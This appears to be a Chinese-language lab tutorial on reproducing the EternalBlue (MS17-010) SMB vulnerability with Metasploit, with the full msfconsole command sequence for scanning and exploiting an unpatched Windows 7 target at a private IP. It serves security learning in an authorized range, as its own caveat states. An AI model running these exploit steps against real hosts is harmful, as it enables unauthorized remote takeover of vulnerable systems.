msf复现永恒之蓝
永恒之蓝(EternalBlue)是利用 Windows 系统的 SMB 协议漏洞(MS17-010)来获取系统最高权限的漏洞,利用 Metasploit 框架(MSF)复现该漏洞是一个复杂且具有一定风险的操作,必须在合法合规的环境下进行,如在经过授权的靶场环境,以下是具体复现步骤:
前期准备
- 攻击机:安装有 Metasploit 工具的 Kali Linux 系统,开启并联网,确保 Metasploit 能正常使用。
- 靶机:存在 MS17-010 漏洞的 Windows 系统,如未打补丁的 Windows 7、Windows Server 2008 R2 等,关闭防火墙和杀毒软件(仅用于测试环境),并记录其 IP 地址,假设为 192.168.244.139 。
- 网络环境:攻击机和靶机处于同一局域网,或可以相互通信.
利用 MSF 复现永恒之蓝漏洞
在 Kali Linux 的终端中输入
msfconsole
,回车启动 Metasploit 框架。
搜索相关模块:输入
search ms17-010
,搜索与 MS17-010 漏洞相关的模块。在搜索结果中,主要关注auxiliary/scanner/smb/smb_ms17_010
(扫描模块)和exploit/windows/smb/ms17_010_eternalblue
(攻击模块) 。
扫描目标主机是否存在漏洞
使用扫描模块:输入
use auxiliary/scanner/smb/smb_ms17_010
,使用该扫描模块。查看缺少的信息:输入show options查看缺少的信息
设置目标主机:输入
set rhosts 192.168.244.139
(将 IP 地址替换为靶机的实际 IP),设置要扫描的目标主机。运行扫描:输入
run
,开始扫描目标主机是否存在 MS17-010 漏洞。如果目标主机存在漏洞,扫描结果会有相应提示。
调用攻击模块:输入
use exploit/windows/smb/ms17_010_eternalblue
,调用永恒之蓝的攻击模块。
配置攻击模块:输入
show options
查看攻击模块的配置项,然后输入set rhosts 192.168.244.139
设置目标机的 IP 地址。执行攻击:输入
run
运行攻击模块,若成功,会与 Windows 7 系统目标机建立连接。
这样就入侵成功了,后续需要进行什么操作可自行选择